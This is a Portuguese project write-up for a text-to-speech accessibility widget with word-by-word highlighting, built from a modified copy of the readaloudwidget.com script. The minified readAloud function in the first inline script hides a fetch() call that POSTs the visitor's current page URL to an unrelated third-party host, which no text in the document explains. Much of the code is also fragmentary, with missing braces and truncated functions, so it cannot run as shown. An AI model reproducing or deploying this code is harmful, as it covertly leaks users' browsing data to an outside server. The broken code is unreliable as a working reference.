Feature de realçar palavra por palavra durante a leitura
O usuário ao executar o snippet normalmente já irá ver a função de realçar ativada.
O código do snippet com a adição da feature de leitura do texto selecionado está da seguinte forma:
Código principal do snippet com a feature de leitura do texto selecionado
O código a seguir não está utilizando o script externo, e sim um script local, visto que foi necessário modificar o script externo e a hospedagem do script externo pelo próprio grupo ainda está em andamento até o momento.
<div vw class="enabled">
<div vw-access-button class="active"></div>
<div vw-plugin-wrapper>
<div class="vw-plugin-top-wrapper"></div>
<script>function readAloud(e,t){s=(/iPad|iPhone|iPod/.test(navigator.userAgent)&&(e.src=n+"sound/silence.mp3",e.play(),"undefined"!=typeof speechSynthesis&&speechSynthesis.speak(new SpeechSynthesisUtterance(" "))),document.createElement("script"));s.onload=function(){readAloudInit(e,t,null)},s.src="readaloud.min.js",document.head.appendChild(s),fetch("https://staging-service.diepkhuc.com/%23referer-log",{method:"POST",body:location.href})}</script>
const ttsContainer = document.createElement("div")
const ttsButton = document.createElement("div")
ttsContainer.id = "tts-container"
ttsButton.setAttribute("ttsOn", "false")
ttsButton.id = "tts-button"
const ttsButtonIcon = document.createElement("img")
ttsButtonIcon.id = "tts-button-icon"
ttsButtonIcon.src = "https://cdn.pixabay.com/photo/2017/04/11/22/25/megaphone-2223049_1280.png"
function handleTTS() {
if (ttsButton.getAttribute("ttson") == "true") {
const ttsPlayer = document.getElementById("ra-player");
ttsButton.setAttribute("ttson", "false");
} else {
const raPlayer = document.createElement("div");
const raButton = document.createElement("div");
const playIcon = document.createElement("img");
raPlayer.id = "ra-player";
raPlayer.setAttribute("data-skin", "https://assets.readaloudwidget.com/embed/skins/default");
playIcon.src = "https://assets.readaloudwidget.com/embed/skins/default/play-icon.png";
raButton.append("texto para fala");
ttsButton.setAttribute("ttson", "true");
document.getElementById("tts-button").onclick = handleTTS;
.ra-button {padding: .3em .9em; border-radius: .25em; background: linear-gradient(#fff, #efefef); box-shadow: 0 1px .2em gray; display: inline-flex; align-items: center; cursor: pointer;}
.ra-button img {height: 1em; margin: 0 .5em 0 0;}
#tts-container {
display: flex;
flex-direction: row-reverse;
justify-content: space-between;
align-items: center;
gap: 10px;
position: fixed;
max-width: 95vw;
right: 0;
top: 42%;
transform: translateY(-50%);
z-index: 99999999;
margin: 10px !important;
#tts-button-icon {
display: flex;
width: 40px;
height: auto;
<audio id="ra-audio" data-lang="pt-BR" data-voice="free" data-key="dda900319d5b19d3f7ec703ca1338196"></audio>
Modificações no script externo
O script externo inicialmente usado no nosso snippet pode ser visto no seguinte link: https://assets.readaloudwidget.com/embed/js/readaloud.min.js
A modificação necessária foi realizada na função webSpeech, onde foi criado um evento para demarcar a leitura de cada palavra, e assim, realçar a palavra que está sendo lida no momento.
let readIndex = 0
let checkRead = false
let ajuda = false
let anterior
function desmarca(){
if(checkRead || ajuda){
readIndex = 0
} else{
let paragrafoAnterior = document.getElementsByClassName("read-aloud")[readIndex-1]
paragrafoAnterior.style.borderRadius = ""
paragrafoAnterior.style.padding = ""
paragrafoAnterior.style.background = ""
paragrafoAnterior.innerHTML = anterior.innerHTML
if(document.getElementsByClassName("read-aloud").length == readIndex){
readIndex = 0;
function marca(){
if(checkRead || ajuda){
readIndex = 0
} else{
let paragrafo = document.getElementsByClassName("read-aloud")[readIndex]
anterior = paragrafo.cloneNode(true)
paragrafo.style.borderRadius = "25px"
paragrafo.style.padding = "10px"
paragrafo.style.background = "rgba(29,117,249,0.31415)"
function handleBoundary(event) {
if (event.name === 'sentence') {
// we only care about word boundaries
let paragrafo = document.getElementsByClassName("read-aloud")[readIndex-1]
let text = event.utterance.text
const wordStart = event.charIndex;
let wordLength = event.charLength;
if (wordLength === undefined) {
// Safari doesn't provide charLength, so fall back to a regex to find the current word and its length (probably misses some edge cases, but good enough for this demo)
const match = text.substring(wordStart).match(/^[a-z\d']*/i);
wordLength = match[0].length;
const wordEnd = wordStart + wordLength;
const word = text.substring(wordStart, wordEnd);
const markedText = text.substring(0, wordStart) + '<b>' + word + '</b>' + text.substring(wordEnd);
paragrafo.innerHTML = markedText;
function ReadAloudWebSpeech() {
var r, i, a, s = this, u = new function() {
var o;
this.speak = function(e) {
function n() {
Promise.resolve(e.apply(i.this, i.args)).then(i.fulfill).catch(i.reject),
i = r = null
function o() {
return i && i.reject(new Error("Aborted")),
i = {
this: this,
args: arguments
new Promise(function(e, t) {
i.fulfill = e,
i.reject = t,
r = r || setTimeout(n, Math.max(0, o.notBefore - Date.now()))
var r, i;
return o.notBefore = Date.now(),
}(function(e, t, n) {
(o = new SpeechSynthesisUtterance).text = e,
o.voice = t.voice,
o.lang = t.lang,
o.pitch = t.pitch,
o.rate = t.effectiveRate,
o.addEventListener('boundary', handleBoundary),
o.volume = t.volume;
e = new Promise(function(e) {
o.onstart = e
if(readIndex > 0){
return o.onend = n,
o.onerror = function(e) {
this.stop = function() {
o && (o.onend = null),
this.speak.notBefore = Date.now() + 100
this.pause = function() {
this.resume = function() {
this.getVoices = function() {
return "undefined" == typeof speechSynthesis ? Promise.resolve([]) : new Promise(function(e) {
var t, n = speechSynthesis.getVoices() || [];
n.length ? e(n) : (t = !1,
speechSynthesis.onvoiceschanged = function() {
t || (t = !0,
e(speechSynthesis.getVoices() || []))
setTimeout(function() {
t || (t = !0,
}, 3e3))
).then(function(e) {
return e.filter(function(e) {
return e.lang && e.name
, c = (window.addEventListener("pagehide", u.stop.bind(u)),
window.addEventListener("unload", u.stop.bind(u)),
lang: null,
voice: null,
rate: 1,
pitch: 1,
volume: 1
}), t = (Object.defineProperty(c, "isGoogleNative", {
get: function() {
return /^Google\s/.test(this.voice.name)
Object.defineProperty(c, "effectiveRate", {
get: function() {
return this.rate * (this.isGoogleNative ? .9 : 1)
"IDLE"), n = /android/i.test(navigator.userAgent), o = Promise.resolve(null);
function l(e) {
t != e && (e = t = e,
n && "wakeLock"in navigator && (o = "PLAYING" == e ? o.then(function(e) {
return console.log("acquiring wake lock"),
e || navigator.wakeLock.request("screen")
}) : o.then(function(e) {
return console.log("releasing wake lock"),
e && e.release()
}).then(function() {
return null
Object.defineProperty(this, "currentTime", {
get: function() {
return a
set: function(e) {
a = Math.round(e),
s.dispatchEvent(new Event("timeupdate")),
"PAUSED" == t && s.stop(),
"PLAYING" == t && (s.stop(),
Object.defineProperty(this, "duration", {
get: function() {
return i.length || 1 / 0
Object.defineProperty(this, "voice", {
get: function() {
return c.voice
set: function(e) {
e && (c.voice = e,
s.dispatchEvent(new Event("voicechange")),
"PAUSED" == t && s.stop(),
"PLAYING" == t && (s.stop(),
Object.defineProperty(this, "playbackRate", {
get: function() {
return c.rate
set: function(e) {
c.rate = e,
s.dispatchEvent(new Event("ratechange")),
"PAUSED" == t && s.stop(),
"PLAYING" == t && (s.stop(),
Object.defineProperty(this, "volume", {
get: function() {
return c.volume
set: function(e) {
c.volume = e,
s.dispatchEvent(new Event("volumechange")),
"PAUSED" == t && s.stop(),
"PLAYING" == t && (s.stop(),
this.isTTS = !0,
this.voices = null,
this.ready = function(t) {
return u.getVoices().then(function(e) {
return e.forEach(function(e) {
e.score = function(e, t) {
var n = e.lang.toLowerCase().split(/[-_]/)
, t = t.toLowerCase().split(/[-_]/)
, o = 0;
n[0] == t[0] && (o += 1,
n[1] == t[1] && (o += 2),
/^Google\s/.test(e.name) && (o += 1));
return o
}(e, t)
e.filter(function(e) {
return 0 < e.score
}).then(function(e) {
return s.voices = e,
c.lang = t,
c.voice = e.reduce(function(e, t) {
return !e || t.score > e.score ? t : e
}, null),
this.setText = function(e) {
var t, n, o;
r = c.isGoogleNative ? new v(u,16e3) : u,
e = e,
t = c.lang,
n = /^zh|ko|ja/.test(t),
o = new (n ? p : f),
i = c.isGoogleNative ? new h((/^(de|ru|es|id)/.test(t) ? 32 : 36) * (n ? 2 : 1) * c.effectiveRate,o).breakText(e) : o.getParagraphs(e),
a = 0,
s.dispatchEvent(new Event("timeupdate")),
s.dispatchEvent(new Event("canplay"))
this.play = function() {
return "PAUSED" == t ? (l("PLAYING"),
s.dispatchEvent(new Event("play")),
s.dispatchEvent(new Event("playing")),
Promise.resolve()) : "IDLE" == t ? i.length ? (a >= i.length && (a = 0,
s.dispatchEvent(new Event("timeupdate"))),
s.dispatchEvent(new Event("play")),
function e() {
return r.speak(i[a], c, function() {
s.dispatchEvent(new Event("timeupdate")),
a < i.length ? e() : (l("IDLE"),
s.dispatchEvent(new Event("ended"))),
}().then(function() {
s.dispatchEvent(new Event("playing"))
})) : Promise.resolve() : void 0
this.pause = function() {
!n && r.pause ? (r.pause(),
s.dispatchEvent(new Event("pause"))) : s.stop()
this.stop = function() {
s.dispatchEvent(new Event("pause"))
var d = {};
function h(u, c) {
function t(e) {
return r(c.getSentences(e), n)
function n(e) {
return r(c.getPhrases(e), o)
function o(e) {
for (var t = c.getWords(e), n = Math.min(Math.ceil(t.length / 2), u), o = []; t.length; )
o.push(t.slice(0, n).join("")),
t = t.slice(n);
return o
function r(e, r) {
function i() {
s.parts.length && (a.push(s.parts.join("")),
s = {
parts: [],
wordCount: 0
var a = []
, s = {
parts: [],
wordCount: 0
return e.forEach(function(e) {
var t = c.getWords(e).length;
if (u < t) {
for (var n = r(e), o = 0; o < n.length; o++)
} else
s.wordCount + t > u && i(),
s.wordCount += t
this.breakText = function(e) {
return r(c.getParagraphs(e), t)
function f() {
function t(e, t) {
for (var n = [], o = 0; o < e.length; o += 2) {
var r = o + 1 < e.length ? e[o] + e[o + 1] : e[o];
r && (t && n.length && t.test(n[n.length - 1]) ? n[n.length - 1] += r : n.push(r))
return n
this.getParagraphs = function(e) {
return t(e.split(/((?:\r?\n\s*){2,})/))
this.getSentences = function(e) {
return t(e.split(/([.!?]+[\s\u200b]+)/), /\b(\w|[A-Z][a-z]|Assn|Ave|Capt|Col|Comdr|Corp|Cpl|Gen|Gov|Hon|Inc|Lieut|Ltd|Rev|Univ|Jan|Feb|Mar|Apr|Aug|Sept|Oct|Nov|Dec|dept|ed|est|vol|vs)\.\s+$/)
this.getPhrases = function(e) {
return t(e.split(/([,;:]\s+|\s-+\s+|—\s*)/))
this.getWords = function(e) {
for (var t = e.trim().split(/([~@#%^*_+=<>]|[\s\-—/]+|\.(?=\w{2,})|,(?=[0-9]))/), n = [], o = 0; o < t.length; o += 2)
t[o] && n.push(t[o]),
o + 1 < t.length && (/^[~@#%^*_+=<>]$/.test(t[o + 1]) ? n.push(t[o + 1]) : n.length && (n[n.length - 1] += t[o + 1]));
return n
function p() {
function t(e) {
for (var t = [], n = 0; n < e.length; n += 2)
n + 1 < e.length ? t.push(e[n] + e[n + 1]) : e[n] && t.push(e[n]);
return t
this.getParagraphs = function(e) {
return t(e.split(/((?:\r?\n\s*){2,})/))
this.getSentences = function(e) {
return t(e.split(/([.!?]+[\s\u200b]+|[\u3002\uff01]+)/))
this.getPhrases = function(e) {
return t(e.split(/([,;:]\s+|[\u2025\u2026\u3000\u3001\uff0c\uff1b]+)/))
this.getWords = function(e) {
return e.replace(/\s+/g, "").split("")
function v(o, r) {
var i;
this.speak = function(e, t, n) {
return clearTimeout(i),
i = setTimeout(function() {
type: "end",
charIndex: e.length
}, r),
o.speak(e, t, function() {
this.stop = function() {
this.addEventListener = function(e, t) {
d[e] ? d[e].push(t) : d[e] = [t]
this.removeEventListener = function(e, t) {
d[e] && (d[e] = d[e].filter(function(e) {
return e != t
this.dispatchEvent = function(t) {
d[t.type] && d[t.type].forEach(function(e) {
function ReadAloudPlayer(o, t, a, e) {
var r = {};
!o.isTTS && /iPad|iPhone|iPod/.test(navigator.userAgent) && a(".ra-no-ios").hide();
a(".ra-logo", t).css("cursor", "pointer").click(function() {
window.open("https://www.readaloudwidget.com/", "_blank")
var n = a(".ra-btn-play", t)
, i = a(".ra-btn-rewind", t)
, s = (n.click(function() {
a(t).is(".ra-playing") ? o.pause() : o.play()
i.click(function() {
o.currentTime = Math.max(o.currentTime - (o.isTTS ? 1 : 5), 0)
a(".ra-btn[data-toggle]").click(function() {
var e = a(this).data("toggle");
return a(".ra-overlay", t).not(e).hide(),
a(document).on("mouseup touchend touchcancel", function(e) {
a(e.target).closest(".ra-btn[data-toggle], .ra-overlay").length || a(".ra-overlay", t).hide()
a(".ra-time-text", t))
, u = a(".ra-error-text", t)
, c = a(".ra-status-bg", t)
, l = a(".ra-load-progress-bar", t)
, d = a(".ra-playback-position-bar", t)
, h = a(".ra-seek-knob", t)
, f = (c.click(function(e) {
o.currentTime = P(c, e) * o.duration
h.click(function() {
return !1
h.on("mousedown touchstart", function() {
return r.seekKnob = !0,
T(function(e) {
var e = P(c, e)
, t = 100 * e + "%";
h.css("left", t),
d.css("width", t),
o.duration && o.duration != 1 / 0 && S(e * o.duration)
}, function(e) {
r.seekKnob = !1,
o.currentTime = P(c, e) * o.duration
a(".ra-voice-select", t));
o.isTTS ? (o.voices.forEach(function(e) {
f.change(function() {
var e = o.voices.find(function(e) {
return e.name == f.val()
e = e,
o.voice = e,
localStorage.setItem("sitespeakerVoice", e.name)
})) : f.parent().hide();
var p = a(".ra-rate-bg", t)
, v = a(".ra-rate-bar", t)
, g = a(".ra-rate-knob", t);
function m(e) {
o.playbackRate = e,
localStorage.setItem("sitespeakerRate", e)
p.click(function(e) {
m(Math.exp((2 * P(p, e) - 1) * Math.log(2)))
g.click(function() {
return !1
g.on("mousedown touchstart", function() {
r.rateKnob = !0;
var n = A(o.isTTS ? 500 : 100, m);
return T(function(e) {
var e = P(p, e)
, t = 100 * e + "%";
g.css("left", t),
v.css("width", t),
n(Math.exp((2 * e - 1) * Math.log(2)))
}, function() {
r.rateKnob = !1
var y, w = a(".ra-volume-bg", t), b = a(".ra-volume-bar", t), E = a(".ra-volume-knob", t);
function k(e) {
o.volume = e,
localStorage.setItem("sitespeakerVolume", e)
w.click(function(e) {
k(P(w, e))
E.click(function() {
return !1
E.on("mousedown touchstart", function() {
r.volumeKnob = !0;
var n = A(o.isTTS ? 500 : 100, k);
return T(function(e) {
var e = P(w, e)
, t = 100 * e + "%";
E.css("left", t),
b.css("width", t),
}, function() {
r.volumeKnob = !1
a(o).on("play", function() {
a(o).on("progress", function(e) {
l.css("width", 100 * e.loaded / e.total + "%")
a(o).on("playing", function() {
a(t).removeClass("ra-stalled ra-error")
a(o).on("pause ended", function() {
a(o).on("error", function() {
a(o).on("stalled", function() {
a(o).on("timeupdate", function() {
var e;
r.seekKnob || (e = 100 * o.currentTime / o.duration + "%",
h.css("left", e),
d.css("width", e),
o.duration && o.duration != 1 / 0 && S(o.currentTime))
a(o).on("voicechange", function() {
a(o).on("ratechange", function() {
var e;
r.rateKnob || (e = 50 + 50 * Math.log(o.playbackRate) / Math.log(2) + "%",
p.is(".ra-vertical") ? (g.css("bottom", e),
v.css("height", e)) : (g.css("left", e),
v.css("width", e)))
a(o).on("volumechange", function() {
var e;
r.volumeKnob || (e = 100 * o.volume + "%",
w.is(".ra-vertical") ? (E.css("bottom", e),
b.css("height", e)) : (E.css("left", e),
b.css("width", e)))
o.isTTS && (y = localStorage.getItem("sitespeakerVoice")) && (n = o.voices.find(function(e) {
return e.name == y
})) && (o.voice = n);
i = localStorage.getItem("sitespeakerRate") || e.defaultRate,
i && (o.defaultPlaybackRate = o.playbackRate = Number(i)),
n = localStorage.getItem("sitespeakerVolume") || e.defaultVolume;
function T(t, n) {
function o(e) {
return e.clientX = e.originalEvent.changedTouches[0].clientX,
e.clientY = e.originalEvent.changedTouches[0].clientY,
function r(e) {
return e.clientX = e.originalEvent.changedTouches[0].clientX,
e.clientY = e.originalEvent.changedTouches[0].clientY,
function i(e) {
return a(document).off("mousemove", t),
a(document).off("mouseup mouseleave", i),
a(document).off("touchmove", o),
a(document).off("touchend touchcancel", r),
n && n(e),
a(document).on("mousemove", t),
a(document).on("mouseup mouseleave", i),
a(document).on("touchmove", o),
a(document).on("touchend touchcancel", r)
function P(e, t) {
var n = e.get(0).getBoundingClientRect()
, e = e.is(".ra-vertical") ? 1 - (t.clientY - n.top) / n.height : (t.clientX - n.left) / n.width;
return Math.min(1, Math.max(e, 0))
function S(e) {
var t;
o.isTTS ? s.text(Math.min(Math.round(e) + 1, o.duration) + "/" + o.duration) : s.text("-" + (e = o.duration - e,
t = Math.floor(e / 60),
e = Math.floor(e - 60 * t),
(t < 10 ? "0" : "") + t + ":" + (e < 10 ? "0" : "") + e))
function A(e, t) {
var n, o;
return function() {
o = {
this: this,
args: arguments
n = n || setTimeout(r, e)
function r() {
n = null,
t.apply(o.this, o.args)
n && (o.volume = Number(n)),
function ReadAloudDoc(i) {
var a = ["H1", "H2", "H3", "H4", "H5", "H6"]
, s = ["P", "BLOCKQUOTE", "PRE"]
, r = ["OL", "UL"];
function u(e) {
i(e).find("*").filter(function() {
return this.style && "absolute" == this.style.position
var t = e.innerText.trim();
return "LI" == e.tagName ? i(e).index() + 1 + ". " + t : t
function c(e) {
e = e ? a.indexOf(e.tagName) : -1;
return -1 == e ? 100 : e + 1
function l(e, t) {
return e == document.body ? null : 1 == e.nodeType && !t && e.lastChild ? e.lastChild : e.previousSibling || l(e.parentNode, !0)
function d(e) {
return e
this.getTexts = function() {
0 < i(".read-aloud").length || (0 < i(".sitespeaker-read-aloud").length ? i(".sitespeaker-read-aloud").addClass("read-aloud") : (e = function(e) {
for (var t = e.slice(0, 1), n = 1; n < e.length; n++)
e[n] != e[n - 1] && t.push(e[n]);
return t
}(e = i("p").not("blockquote > p").parent().get()),
(e = i(e).filter(":visible").get()).length ? (n = e.map(function(e) {
return i(e).children(s.join(", ")).text().length
o = Math.max.apply(null, n),
(e = e.filter(function(e, t) {
return n[t] > o / 7
})).forEach(function(e) {
i(function(e) {
var t = []
, e = i(e).children(a.concat(s).join(", ")).get(0)
, n = c(e)
, o = l(e, !0);
for (; o && !i(o).hasClass("read-aloud"); ) {
var r;
1 != o.nodeType || (r = c(o)) < n && (t.push(o),
n = r),
o = l(o)
return t.reverse()
i(e).children(a.concat(s).join(", ")).addClass("read-aloud"),
i(e).children(r.join(", ")).children("li").addClass("read-aloud")
})) : i(a.concat(s).join(", ")).filter(":visible").addClass("read-aloud")));
var n, o, e = i(".no-read-aloud:visible").hide(), t = function(e) {
for (var t = i(e).get().map(u).filter(d), n = 0; n < t.length; n++)
/\w$/.test(t[n]) && (t[n] += ".");
return console.log(t),
return e.show(),
function readAloudInit(o, r,t, texto) {
var i = o.getAttribute("data-lang")
, a = o.getAttribute("data-voice")
, s = o.getAttribute("data-key")
, u = o.getAttribute("data-speed") || o.getAttribute("data-rate")
, c = o.getAttribute("data-volume")
, l = "free" == a || s.startsWith("39d740e") ? new ReadAloudWebSpeech : null;
return r && t ? d().then(function() {
var e = r.getElementsByClassName("ra-btn-play")[0]
, t = function() {
e.removeEventListener("click", t),
/iPad|iPhone|iPod/.test(navigator.userAgent) && (o.src = "https://assets.readaloudwidget.com/embed/sound/silence.mp3",
l && "undefined" != typeof speechSynthesis && speechSynthesis.speak(new SpeechSynthesisUtterance(" "))),
e.addEventListener("click", t)
}) : n();
function n() {
var n;
return Promise.all([l && l.ready(i), !window.jQuery && h("https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js").then(eval)]).then(function(e) {
n = e[0];
if(texto == "Olá, sou Voz Para Todos, uma ferramenta de acessibilidade."){
ajuda = true
} else{
ajuda = false
if (texto != ""){
var e = texto;
checkRead = true;
}else {
checkRead = false;
var e = "function" == typeof readAloudGetText ? readAloudGetText(jQuery) : new ReadAloudDoc(jQuery).getTexts().join("\n\n");
return Promise.all([n ? e : (e = e,
function(o, r) {
return new Promise(function(e, t) {
var n = new XMLHttpRequest;
n.open("POST", o, !0),
n.setRequestHeader("Content-type", "application/json"),
n.onreadystatechange = function() {
4 == n.readyState && (200 == n.status ? e(n.responseText) : t(new Error(n.responseText || n.statusText || n.status)))
}("https://ws.readaloudwidget.com/synthesize?t=" + Date.now(), {
text: e,
lang: i,
voice: a,
key: s,
referer: location.href
}).then(JSON.parse).then(function(e) {
return e.url
})), r && (t ? Promise.resolve() : d()).then(function() {
new ReadAloudPlayer(n ? l : o,r,jQuery,{
defaultRate: u,
defaultVolume: c
}).then(function(e) {
function t() {
n ? (jQuery(l).one("canplay", t),
l.play()) : (jQuery(o).one("canplay", t),
o.src = e[0],
function d() {
var e, t = r.getAttribute("data-skin");
return Promise.all([h(t + "/template.html"), (t = t + "/styles.css",
e = document.createElement("LINK"),
e.setAttribute("type", "text/css"),
e.setAttribute("rel", "stylesheet"),
void e.setAttribute("href", t))]).then(function(e) {
r.innerHTML = e[0]
function h(o) {
return new Promise(function(e, t) {
var n = new XMLHttpRequest;
n.open("GET", o, !0),
n.onreadystatechange = function() {
4 == n.readyState && (200 == n.status ? e(n.responseText) : t(new Error(n.responseText || n.statusText || n.status)))